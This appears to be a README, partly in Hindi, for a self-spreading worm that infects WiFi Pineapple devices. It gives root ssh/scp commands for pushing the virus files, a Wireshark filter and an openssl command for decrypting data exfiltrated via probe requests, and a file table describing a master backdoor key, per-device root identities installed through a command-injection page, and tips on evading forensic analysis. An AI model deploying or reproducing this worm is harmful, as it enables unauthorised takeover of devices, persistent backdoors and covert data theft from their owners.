
A WiFi Pineapple infecting worm.
./build.sh
ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
नोट: आपके पास एक कॉन्फ़िगर किया गया डिवाइस होना आवश्यक है या ssh को सक्षम करने के लिए metasploit-module का उपयोग करें
wireshark फ़िल्टर है:
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem
वैकल्पिक रूप से, harvest.py स्क्रिप्ट का उपयोग इस प्रकार करें:
python harvest.py [monitor-iface]
| फ़ाइल | उद्देश्य |
|---|---|
| tv | वायरस स्वयं। |
| tvbd | "मास्टर" बैकडोर कुंजी, निजी कुंजी वितरित न करें। |
| tvd | प्रकटीकरण कुंजी, probe requests के माध्यम से डेटा एक्सफ़िल्ट्रेट करने के लिए उपयोग की जाती है। |
| tospo_rsa | पहचान निजी कुंजी, प्रत्येक संक्रमित डिवाइस के लिए विशिष्ट, स्थानांतरण कुंजी के रूप में उपयोग की जाती है। |
| tospo_rsa.pub | पहचान सार्वजनिक कुंजी, command injection पृष्ठ के माध्यम से स्थानांतरित की जाती है ताकि निजी पहचान दूरस्थ डिवाइस पर root के रूप में कार्य कर सके। |
| w | पुश किए गए वायरलेस कॉन्फ़िगरेशन विकल्प, पिछले कनेक्शनों को पुनर्स्थापित करने के लिए उपयोग किए जाते हैं। |
| n | पुश किए गए नेटवर्क कॉन्फ़िगरेशन विकल्प, पिछले कनेक्शनों को पुनर्स्थापित करने के लिए उपयोग किए जाते हैं। |
नोट: 'tv' से शुरू होने वाली सभी फ़ाइलें किसी नए डिवाइस को संक्रमित करते समय स्थानांतरित की जाती हैं। 'tv' से शुरू होने वाले नामों का उपयोग करके निजी कुंजियाँ और इसी प्रकार की चीज़ें न जोड़ें, अन्यथा आपकी निजी कुंजी फोरेंसिक विश्लेषण के लिए उजागर हो जाएगी।